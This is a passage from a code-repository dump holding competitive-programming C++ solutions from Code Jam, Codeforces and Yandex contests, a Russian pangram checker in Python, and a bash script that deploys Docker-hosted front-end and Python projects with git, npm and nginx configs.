tie(bottleIndex, nextPlace) = getBottleIndex(found, true);\n }\n }\n shoot(found, bottleIndex, nextPlace);\n }\n double in = clock() - time;\n#ifndef ONLINE_JUDGE\n //cerr << \"Done in \" << in / CLOCKS_PER_SEC << \" secs (\" << *hams.begin() << \")\\n\";\n#endif\n return tuple(in, *hams.begin(), actions);\n };\n\n double time = clock();\n double TL = 15;\n int runNumber = 0;\n auto [tm, ans, actions] = getAnswer(runNumber++);\n\n while ((clock() - time + tm * 2) / CLOCKS_PER_SEC < TL)\n if (auto [_, tempAns, tempActions] = getAnswer(runNumber++); tempAns > ans)\n ans = tempAns,\n actions = tempActions;\n cerr << ans << \"\\n\";\n#ifdef ONLINE_JUDGE\n writeln(actions);\n#endif\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false);\n// freopen(FILENAME\".in\", \"r\", stdin);\n// freopen(FILENAME\".out\", \"w\", stdout);\n run();\n return 0;\n}\n\n#define a _a\n#define n _n\nttti ostream&operator<<(ostream&os,vector<T>&a);\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>&a){return os<<a.first<<\" \"<<a.second;}\nttti ostream&operator<<(ostream&os,vector<T>&a){if(a.size())os<<a[0];else os<<\"\\n\";fori1(a.size())os<<\"\\n \"[is_fundamental<T>::value]<<a[i];return os;}\nttti ostream&operator<<(ostream&os,valarray<T>&a){if(a.size())os<<a[0];else os<<\"\\n\";fori1(a.size())os<<\"\\n \"[is_fundamental<T>::value]<<a[i];return os;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti istream&operator>>(istream&is,valarray<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T a){cout<<\" \"<<a;}\nttti void priws(T a){cout<<a;}\nttti void read(T& a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.5009862184524536, "alphanum_fraction": 0.516765296459198, "avg_line_length": 20.08333396911621, "blob_id": "8e41a5136b57cd9e361dca80a8149eaddbf8d2d2", "content_id": "08688dc6f9094f471880f9503fc4f51462aa468a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 573, "license_type": "no_license", "max_line_length": 41, "num_lines": 24, "path": "/2023/tin/1.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "\nttt = 'йцукенгшщзхъэждлорпавыфячсмитьбюё'\nsss = 'ЙЦУКЕНГШЩЗХЪЭЖДЛОРПАВЫФЯЧСМИТЬБЮЁ'\n\ndef get(c):\n for i in range(33):\n if ttt[i] == c or sss[i] == c:\n return i\n return -1\n\ndef is_pangram(text: str) -> bool:\n a = [False] * 33\n for c in text:\n d = get(c)\n if d != -1:\n a[d] = True\n for i in range(33):\n if not a[i]:\n return False\n return True\n\n\nif __name__ == \"__main__\":\n input_str = input()\n print(is_pangram(input_str))\n" }, { "alpha_fraction": 0.5378863215446472, "alphanum_fraction": 0.5555832386016846, "avg_line_length": 36.14814758300781, "blob_id": "6ba1d75262fb1404eb477037bfbd74f64dd1263b", "content_id": "09ebbafe6b2c7d470602f081cb36a55989e68ea1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4012, "license_type": "no_license", "max_line_length": 174, "num_lines": 108, "path": "/2020/gcj2/A.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version, modified 18 march 2020 (writeln<tuple>, whole->all) {{{\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(a.size())\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define all(a) begin(a), end(a)\n#define ints(a...) int a; readln(a)\n\n[[maybe_unused]] const int MOD = 1000000007;\n[[maybe_unused]] const int INTMAX = numeric_limits<int>::max();\n\n#define ttt12i template<class T1, class T2> inline\n#define ttti template<class T> inline\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\ntemplate<class... Args> inline void readln(Args&... args){(read(args),...);}\ntemplate<class H, class...T> inline void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\n\n//Igorjan\n//printTuple\ntemplate<class Tuple, size_t... Is> ostream& print_tuple(ostream& os, const Tuple& t, index_sequence<Is...>) { ((os << (Is == 0 ? \"\" : \" \") << get<Is>(t)), ...); return os; }\ntemplate<class Tuple, size_t... Is> istream& read_tuple(istream& is, Tuple& t, index_sequence<Is...>) { ((is >> get<Is>(t)), ...); return is; }\ntemplate<class... Args> inline ostream& operator<<(ostream& os, const tuple<Args...>& t) { return print_tuple(os, t, index_sequence_for<Args...>{}); }\ntemplate<class... Args> inline istream& operator>>(istream& is, tuple<Args...>& t) { return read_tuple(is, t, index_sequence_for<Args...>{}); }\n\n//binSearch\n//x -> min, f(x) == true\ntemplate<typename T, typename F>\nT binSearch(T l, T r, F f, T eps = 1)\n{\n T m;\n while (abs(r - l) > eps)\n m = l + (r - l) / 2,\n (f(m) ? r : l) = m;\n return f(l) ? l : r;\n}\n\n//debug\nvector<string>split(string&s,const string& d){vector<string> v;size_t p=0;while((p=s.find(d))!=string::npos)v.pb(s.substr(0,p)),s.erase(0,p+d.length());v.pb(s);return v;}\n//}}}\n\ntuple<ll, ll, ll> run()\n{\n ll l, r;\n readln(l, r);\n ll start = 1;\n ll n = 0;\n while (true)\n {\n if (start > max(l, r)) break;\n\n ll mx = max(l, r) - min(l, r);\n if (start > mx)\n {\n n++;\n (l >= r ? l : r) -= start;\n start++;\n continue;\n }\n\n auto get = [](ll x) { return x * (x + 1) / 2; };\n ll x = binSearch(start, mx + 1, [&](ll m) {\n return get(m) - get(start - 1) > mx;\n });\n ll temp = get(x - 1) - get(start - 1);\n n += x - start;\n start = x;\n (l >= r ? l : r) -= temp;\n }\n return {n, l, r};\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false);\n ints(t);\n fori(t)\n cout << \"Case #\" << (i + 1) << \": \" << run() << \"\\n\";\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n\n#define a _a\n#define n _n\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a);\ntemplate<typename T,typename D=decltype(*begin(declval<T>())),typename enable_if<!is_same<T,basic_string<char>>::value>::type* =nullptr>\nostream&operator<<(ostream&os,T const&a){auto it=begin(a);if(it!=end(a))os<<*it++;while(it!=end(a))os<<\"\\n \"[is_fundamental<typename T::value_type>::value]<<*it++;return os;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.5067257285118103, "alphanum_fraction": 0.518278181552887, "avg_line_length": 33.91160202026367, "blob_id": "a440f61a705e8ebbde658817dc02337bce743bb3", "content_id": "e74124c875187e5204a2f8f77bb6e68d99e5d0d9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 6319, "license_type": "no_license", "max_line_length": 252, "num_lines": 181, "path": "/scripts/test.sh", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#!/usr/bin/env bash\n# [{\n# type: front,\n# name: damosFront,\n# container: nginx,\n# rep: http://bitbucket.org/konekon/1705-front-end.git,\n# server: http://konekon.ru/damos/ #Backand URL\n# host: 1705.konekon.ru, #Virtual host from internet\n# }, {\n# type: node,\n# name: damosNode,\n# container: node, #Default: type\n# rep: http://bitbucket.org/konekon/1705-back-end.git,\n# server: http://konekon.ru/, #Server, backend is on\n# host: damos, #Backend will be available on $server:81/$host\n# port: 20000, #Port. It should be autogenerated(cauze doesn't have any meaning. But later)\n# arguments: \"DATABASE='mysql://.....'\" #Arguments to nodeJS on startup: $arguments node --harmony bin/www. Env with mode and host/port is already defined\n# }]\n\n#Staff #{{{\nsettings=\"/home/igorjan/settings.json\"\nif [ ! -f $settings ]; then\n echo '[]' > \"$settings\"\nfi\n\nprojects=`jq '.' $settings`\n\nfail () {\n echo \"$1\"\n exit 1\n}\n\nusage () {\n cat $settings\n exit 0\n}\n\ntoNamedParams () {\n type=$1\n name=$2\n container=$3\n rep=$4\n server=$5\n host=$6\n port=$7\n arguments=$8\n folder=$9\n script=${10}\n branch=${11}\n if [ ! \"$container\" ]; then container=\"$type\"; fi\n}\n\naddProject () {\n toNamedParams \"$@\"\n projects=`echo $projects | jq \". + [{\n \\\"type\\\": \\\"$type\\\",\n \\\"name\\\": \\\"$name\\\",\n \\\"container\\\": \\\"$container\\\",\n \\\"rep\\\": \\\"$rep\\\",\n \\\"server\\\": \\\"$server\\\",\n \\\"host\\\": \\\"$host\\\",\n \\\"port\\\": \\\"$port\\\",\n \\\"arguments\\\": \\\"$arguments\\\",\n \\\"folder\\\": \\\"$folder\\\",\n \\\"script\\\": \\\"$script\\\",\n \\\"branch\\\": \\\"$branch\\\"\n}]\"`\n}\n\ngetProjectByName () {\n found=`echo $projects | jq \"map(select(.name == \\\"$1\\\"))[]\"`\n foundName=`echo $found | jq -r '.name'`\n foundType=`echo $found | jq -r '.type'`\n foundContainer=`echo $found | jq -r '.container'`\n foundRep=`echo $found | jq -r '.rep'`\n foundServer=`echo $found | jq -r '.server'`\n foundHost=`echo $found | jq -r '.host'`\n foundPort=`echo $found | jq -r '.port'`\n foundArguments=`echo $found | jq -r '.arguments'`\n foundFolder=`echo $found | jq -r '.folder'`\n foundScript=`echo $found | jq -r '.script'`\n foundBranch=`echo $found | jq -r '.branch'`\n unset found\n if [ \"$foundType\" != \"\" ]; then found=true; fi\n}\n\ndeleteProjectByName () {\n projects=`echo $projects | jq \"map(select(.name != \\\"$1\\\"))\"`\n}\n\ncheckType () {\n if [ \"$1\" == \"node\" ] || [ \"$1\" == \"front\" ] || [ \"$1\" == \"tarantool\" ] || [ \"$1\" == \"python\" ]; then return; fi\n fail \"Incorrect type!\"\n}\n\n\n\n\n\n#}}}\n\n#Options #{{{\nOPTS=`getopt -o ht:n:c:r:s:h:p:a:f:b: -l type:,name:,container:,rep:,repository:,server:,host:,port:,arguments:,folder:,script:,branch:,help -- \"$@\"`\nif [ $? != 0 ]; then exit 1; fi\neval set -- \"$OPTS\"\n\n#parsing arguments\nwhile true ; do\n case \"$1\" in\n --help ) usage ;shift;;\n\n -t | --type ) type=$2 ;shift 2;;\n -n | --name ) name=$2 ;shift 2;;\n -c | --container ) container=$2 ;shift 2;;\n -r | --rep | --repository ) rep=$2 ;shift 2;;\n -s | --server ) server=$2 ;shift 2;;\n -h | --host ) host=$2 ;shift 2;;\n -p | --port ) port=$2 ;shift 2;;\n -a | --arguments ) arguments=$2 ;shift 2;;\n -f | --folder ) folder=$2 ;shift 2;;\n -b | --branch ) branch=$2 ;shift 2;;\n --script ) script=$2 ;shift 2;;\n\n -- ) shift; break;;\n esac\ndone #}}}\n\n#Parsing # {{{\nif [ \"$1\" == \"create\" ]; then # {{{\n if [ ! \"$name\" ] || [ ! \"$type\" ] || [ ! \"$rep\" ]; then fail \"Type and name and rep are required!\"; fi\n case \"$name\" in\n *\\ *) fail 'Name cannot contain spaces!';;\n esac\n\n getProjectByName \"$name\"\n if [ \"$found\" ]; then fail \"Project already exists!\"; fi\n checkType $type\n\n if [ ! \"$branch\" ]; then branch=\"master\"; fi\n addProject \"$type\" \"$name\" \"$container\" \"$rep\" \"$server\" \"$host\" \"$port\" \"$arguments\" \"$folder\" \"$script\" \"$branch\"\n if [ \"$type\" == \"front\" ]; then #{{{\n docker exec -ti \"$container\" bash -c \"mkdir -p /home/nesuko && cd /home/nesuko && rm -rf $name && git clone $rep $name && cd $name && git checkout $branch && npm i && bower i -F --allow-root\"\n docker exec -ti \"$container\" bash -c \"rm -rf /var/www/$name && mkdir -p /var/www/$name\"\n docker exec -ti \"$container\" bash -c \"cd /home/nesuko/$name && SRV=$server npm run $script && cp -r /home/nesuko/$name/$folder /var/www/$name\"\n docker exec -ti \"$container\" bash -c \"echo -e \\\"server {\n listen 80;\n\n server_name $host;\n root /var/www/$name/$folder;\n index index.html index.htm;\n\n location / {\n allow all;\n try_files \\\"'$'\\\"uri \\\"'$'\\\"uri/ /index.html =404;\n }\n}\\\" > /etc/nginx/sites-available/$host\"\n docker exec -ti \"$container\" bash -c \"ln -fs /etc/nginx/sites-available/$host /etc/nginx/sites-enabled/$host\"\n docker kill -s HUP $container\n#}}}\n fi #}}}\n# }}}\n\nelif [ \"$1\" == \"pull\" ]; then # {{{\n if [ ! \"$name\" ]; then fail \"Name is required!\"; fi\n getProjectByName \"$name\"\n if [ ! \"$found\" ]; then fail \"Project with name '$name' is not found!\"; fi\n\n if [ $foundType == \"front\" ]; then\n\tif [ \"$branch\" ]; then foundBranch=\"$branch\"; fi\n\tif [ ! \"$foundBranch\" ]; then foundBranch=\"master\"; fi\n docker exec -ti $foundContainer bash -c \"cd /home/nesuko/$foundName && git stash && git checkout $foundBranch && git pull && npm i --all && SRV=$foundServer npm run $foundScript && cp -r /home/nesuko/$foundName/$foundFolder /var/www/$foundName\"\n elif [ \"$foundType\" == \"python\" ]; then\n cd /home/igorjan/$foundName && git pull && docker exec -ti \"$foundContainer\" bash -c \"pip install -r requirements.txt\"\n docker exec -ti \"$foundContainer\" bash -c \"./manage.py migrate\"\n docker restart \"$foundContainer\"\n fi\nfi #}}}\n# }}}\n\n# echo \"$projects\"\necho \"$projects\" > $settings\n" }, { "alpha_fraction": 0.3619847297668457, "alphanum_fraction": 0.382595419883728, "avg_line_length": 31.266010284423828, "blob_id": "be11bdc271c954376ca04102148a351d0565df93", "content_id": "088fae58ef42d367c3eaa52515b44cd69a5661f4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 6550, "license_type": "no_license", "max_line_length": 174, "num_lines": 203, "path": "/CodeForce/1333/E.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version, modified 18 march 2020 (writeln<tuple>, whole->all) {{{\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define all(a) begin(a), end(a)\n#define ints(a...) int a; readln(a)\n\n[[maybe_unused]] const int MOD = 1000000007;\n[[maybe_unused]] const int INTMAX = numeric_limits<int>::max();\n\n#define ttt12i template<class T1, class T2> inline\n#define ttti template<class T> inline\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\ntemplate<class... Args> inline void readln(Args&... args){(read(args),...);}\ntemplate<class H, class...T> inline void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\n\n//Igorjan\n//}}}\n\nvoid run()\n{\n ints(n);\n if (n <= 2)\n return writeln(-1);\n if (n == 3)\n {\n vector<vector<int>> e = {{1, 2, 4}, {5, 3, 8}, {9, 6, 7}};\n return writeln(e);\n vector<int> a(9);\n iota(all(a), 1);\n do\n {\n int q = 0;\n int r = 0;\n auto get = [&](int i, int j) {\n return a[i * 3 + j];\n };\n vector<vector<bool>> rook(3, {false, false, false});\n vector<vector<bool>> queen(3, {false, false, false});\n auto getMin = [&](vector<vector<bool>>& used) {\n pii ans = {-1, -1};\n int mn = 100;\n fori(n)\n forj(n)\n if (!used[i][j] && mn > get(i, j))\n mn = get(i, j),\n ans = {i, j};\n return ans;\n };\n auto getRook = [&](vector<vector<bool>>& used, int x, int y) {\n int mn = 100;\n pii ans = {-1, -1};\n fori(n)\n if (!used[x][i] && get(x, i) < mn)\n mn = get(x, i), ans = {x, i};\n fori(n)\n if (!used[i][y] && get(i, y) < mn)\n mn = get(i, y), ans = {i, y};\n return ans;\n };\n auto getQueen = [&](vector<vector<bool>>& used, int x, int y) {\n int mn = 100;\n pii ans = {-1, -1};\n fori(n)\n if (!used[x][i] && get(x, i) < mn)\n mn = get(x, i), ans = {x, i};\n fori(n)\n if (!used[i][y] && get(i, y) < mn)\n mn = get(i, y), ans = {i, y};\n fori(n)\n forj(n)\n if (i - j == x - y)\n if (!used[i][j] && get(i, j) < mn)\n mn = get(i, j), ans = {i, j};\n fori(n)\n forj(n)\n if (i + j == x + y)\n if (!used[i][j] && get(i, j) < mn)\n mn = get(i, j), ans = {i, j};\n return ans;\n };\n while (true)\n {\n auto [i, j] = getMin(rook);\n if (i == -1)\n break;\n rook[i][j] = true;\n r++;\n do\n {\n auto [ni, nj] = getRook(rook, i, j);\n if (ni == -1)\n break;\n i = ni;\n j = nj;\n rook[i][j] = true;\n }\n while (true);\n }\n writeln(a);\n while (true)\n {\n auto [i, j] = getMin(queen);\n if (i == -1)\n break;\n queen[i][j] = true;\n q++;\n do\n {\n auto [ni, nj] = getQueen(queen, i, j);\n if (ni == -1)\n break;\n i = ni;\n j = nj;\n queen[i][j] = true;\n writeln(queen);\n }\n while (true);\n }\n\n if (q > r)\n {\n writeln(q, r);\n writeln(a);\n return;\n }\n }\n while (next_permutation(all(a)));\n return writeln(a);\n }\n vector<vector<int>> a = {\n {4, 3, 6, 12},\n {7, 5, 9, 15},\n {14, 1, 11, 10},\n {13, 8, 16, 2}\n };\n if (n == 4)\n return writeln(a);\n vector<vector<int>> b(n, vector<int>(n));\n int c = 1;\n forn(q, n - 4)\n {\n if ((n - q) % 2 == 1)\n {\n ROF(j, n - 1, q)\n b[q][j] = c++;\n FOR(i, q + 1, n)\n b[i][q] = c++;\n }\n else\n {\n ROF(j, n - 1, q)\n b[j][q] = c++;\n FOR(i, q + 1, n)\n b[q][i] = c++;\n }\n\n if (q == n - 5)\n swap(b[n - 1][q], b[n - 2][q]);\n }\n fori(4)\n forj(4)\n b[i + n - 4][j + n - 4] = a[i][j] + (n * n - 16);\n\n writeln(b);\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false);\n run();\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n\n#define a _a\n#define n _n\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a);\ntemplate<typename T,typename D=decltype(*begin(declval<T>())),typename enable_if<!is_same<T,basic_string<char>>::value>::type* =nullptr>\nostream&operator<<(ostream&os,T const&a){auto it=begin(a);if(it!=end(a))os<<*it++;while(it!=end(a))os<<\"\\n \"[is_fundamental<typename T::value_type>::value]<<*it++;return os;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.40944716334342957, "alphanum_fraction": 0.4410082697868347, "avg_line_length": 22.371286392211914, "blob_id": "727c5c22dc55bdca470e63a4132a6c79ad2ac60a", "content_id": "4ac9a5a78bf3a4d3081dd26ee7a95a9d3289b3a9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4721, "license_type": "no_license", "max_line_length": 262, "num_lines": 202, "path": "/CodeForce/0940/F_peanoOrder.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version, modified 18 march 2020 (writeln<tuple>, whole->all) {{{\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\ntypedef unsigned int uint;\ntypedef unsigned long long ull;\n\n#define pb push_back\n#define all(a) begin(a), end(a)\n#define ints(a...) int a; readln(a)\n\n[[maybe_unused]] const int MOD = 1000000007;\n[[maybe_unused]] const int INTMAX = numeric_limits<int>::max();\n\nstatic const auto IOSetup = [] {\n std::cin.tie(nullptr)->sync_with_stdio(false);\n // std::cout << std::setprecision(6) << std::fixed;\n return nullptr;}();\nstruct IOPre {static constexpr int TEN = 10, SZ = TEN * TEN * TEN * TEN;std::array<char, 4 * SZ> num;constexpr IOPre() : num{} {for (int i = 0; i < SZ; i++) {int n = i;for (int j = 3; j >= 0; j--) {num[i * 4 + j] = static_cast<char>(n % TEN + '0');n /= TEN;}}}};\n\nconst int N = 100010;\nconst int Q = 100010;\n \nint64_t peanoOrder(int x,int y,int z,int m) {\n vector<vector<int>> a(3, vector<int>(m));\n int sum0 = 0, sum1 = 0, sum2 = 0;\n int ptr = m-1;\n while (x) {\n a[0][ptr] = x%3;\n sum0 += a[0][ptr];\n ptr--;\n x /= 3;\n }\n ptr = m-1;\n while (y) {\n a[1][ptr] = y%3;\n sum1 += a[1][ptr];\n ptr--;\n y /= 3;\n }\n ptr = m-1;\n while (z) {\n a[2][ptr] = z%3;\n sum2 += a[2][ptr];\n ptr--;\n z /= 3;\n }\n \n for (int i = m-1; i >= 0; i--) {\n sum2 -= a[2][i];\n if ((sum0 + sum1)&1)\n a[2][i] = 2 - a[2][i];\n \n sum1 -= a[1][i];\n if ((sum0 + sum2)&1)\n a[1][i] = 2 - a[1][i];\n \n sum0 -= a[0][i];\n if ((sum1 + sum2)&1)\n a[0][i] = 2 - a[0][i];\n }\n \n int64_t num = 0, base = 1;\n for (int j = m-1; j >= 0; j--) {\n num += base * a[2][j];\n base *= 3;\n num += base * a[1][j];\n base *= 3;\n num += base * a[0][j];\n base *= 3;\n }\n return num;\n}\n\ntuple<int, int, int, int, int64_t> requests[Q];\narray<int, 3> updates[Q];\nint a[N];\nint ans[Q];\n\nmap<int, int> coords;\nint m[N * 3];\nint diffsCNT[N + 10];\nint n, q;\nint L = 0;\nint R = -1;\nint T = 0;\nint A = 0;\nint B = 0;\n\ninline void er(int x) {\n --diffsCNT[x];\n}\n\ninline void ad(int x) {\n ++diffsCNT[x];\n}\n\ninline void add(int id) {\n int x = a[id];\n er(m[x]);\n ad(++m[x]);\n}\n\ninline void del(int id) {\n int x = a[id];\n er(m[x]);\n ad(--m[x]);\n}\n\ninline void update(int index, bool forward) {\n auto [i, from, to] = updates[index];\n if (!forward) to = from;\n if (L <= i && i <= R)\n del(i);\n a[i] = to;\n if (L <= i && i <= R)\n add(i);\n}\n\nint get(int x) {\n auto it = coords.find(x);\n if (it != coords.end())\n return it->second;\n int sz = coords.size();\n return coords[x] = sz;\n}\n\nvoid run()\n{\n cin >> n >> q;\n fori(n)\n {\n cin >> a[i];\n a[i] = get(a[i]);\n }\n\n fori(q)\n {\n int type, l, r;\n cin >> type >> l >> r; --l;\n if (type == 1)\n {\n --r;\n auto order = peanoOrder(l, r, B, 13);\n requests[A] = {B, l, r, A, order};\n ++A;\n }\n else\n {\n r = get(r);\n updates[B++] = {l, a[l], r};\n a[l] = r;\n }\n }\n for (int i = B - 1; i >= 0; --i)\n a[updates[i][0]] = updates[i][1];\n\n sort(requests, requests + A, [&](const auto& a, const auto& b) {\n return get<4>(a) < get<4>(b);\n });\n\n fori(A)\n {\n const auto& [t, l, r, id, _] = requests[i];\n while (T < t) update(T++, true);\n while (T > t) update(--T, false);\n while (R < r) add(++R);\n while (L > l) add(--L);\n while (R > r) del(R--);\n while (L < l) del(L++);\n for (int mex = 1; ; ++mex)\n if (diffsCNT[mex] == 0)\n {\n ans[id] = mex;\n break;\n }\n }\n fori(A)\n cout << ans[i] << \"\\n\";\n}\n\n//{{{\nint main()\n{\n cin.tie(0); ios_base::sync_with_stdio(false);\n run();\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n" }, { "alpha_fraction": 0.3177570104598999, "alphanum_fraction": 0.3448598086833954, "avg_line_length": 16.482759475708008, "blob_id": "32b46dd1d4d6af5e367b581e2847120aee50199a", "content_id": "17de8f249aec72783310e5ed491cf9e5eaec5066", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1070, "license_type": "no_license", "max_line_length": 45, "num_lines": 58, "path": "/trains/western2014/I.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <cstdio>\r\n#include <iostream>\r\n#include <algorithm>\r\n#include <cmath>\r\n#include <ctime>\r\n\r\nusing namespace std;\r\n\r\nconst int MaxN = 1239;\r\n\r\n\r\nint a[MaxN][MaxN];\r\n\r\nint n, k;\r\nint main()\r\n{\r\n cin >> k >> n;\r\n if (!(k - 1)){\r\n int sum = 0, mx = -1, x;\r\n for (int i = 0; i < n; ++i){\r\n cin >> x;\r\n mx = max(mx, x);\r\n sum += x;\r\n }\r\n sum += mx;\r\n cout << sum;\r\n return 0;\r\n }\r\n\r\n\r\n int x;\r\n for (int i = 0; i < k; ++i)\r\n for (int j = 0; j < n; ++j)\r\n cin >> a[j][i];\r\n for (int i = 0; i < n; ++i)\r\n sort(a[i], a[i] + k);\r\n\r\n\r\n int maxi = -1, d = -1;\r\n for (int i = 0; i < n; ++i){\r\n int nxt = min (2 * a[i][0], a[i][1]);\r\n if (d < nxt - a[i][0]){\r\n maxi = i;\r\n d = nxt - a[i][0];\r\n }\r\n }\r\n a[maxi][0] *= 2;\r\n if (a[maxi][0] > a[maxi][1])\r\n swap (a[maxi][0], a[maxi][1]);\r\n int sum = 0;\r\n for (int i = 0; i < n; ++i){\r\n sum += a[i][0];\r\n }\r\n\r\n cout << sum;\r\n\r\n\r\n}" }, { "alpha_fraction": 0.4499843120574951, "alphanum_fraction": 0.4683286249637604, "avg_line_length": 28.665115356445312, "blob_id": "27126249242bbccc4570885c287ad91650452620", "content_id": "17be5b0f76ce085da405be09b7fb8db2fd76dae7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 6378, "license_type": "no_license", "max_line_length": 173, "num_lines": 215, "path": "/2021/yandexBackendFinal/I.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version, modified 18 march 2020 (writeln<tuple>, whole->all) {{{\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define all(a) begin(a), end(a)\n#define ints(a...) int a; readln(a)\n\n[[maybe_unused]] const int MOD = 1000000007;\n[[maybe_unused]] const int INTMAX = numeric_limits<int>::max();\n\n#define ttt12i template<class T1, class T2> inline\n#define ttti template<class T> inline\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\ntemplate<class... Args> inline void readln(Args&... args){(read(args),...);}\ntemplate<class H, class...T> inline void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\n\n//Igorjan\n//}}}\n\nmap<char, int> m, v;\n\nstruct user\n{\n vector<pii> cards;\n string name;\n user(){}\n int combination = 0;\n vector<int> mxx;\n\n void add(string& s)\n {\n pii card = {0, m[s.back()]};\n if (s[0] != ' ')\n card.first = 10;\n else if (s[1] >= '2' && s[1] <= '9')\n card.first = s[1] - '0';\n else\n card.first = v[s[1]];\n cards.pb(card);\n }\n\n void calc()\n {\n\t\tint mx = 0;\n\t\tint mmx = 0;\n map<int, int> c;\n for (pii& p: cards)\n c[p.first]++,\n mx = max(mx, p.first);\n bool flash = true;\n bool street = true;\n vector<pii> sets;\n vector<pii> fours;\n vector<pii> pairs;\n for (auto& [k, v]: c)\n if (v == 4)\n fours.pb({k, v});\n else if (v == 3)\n 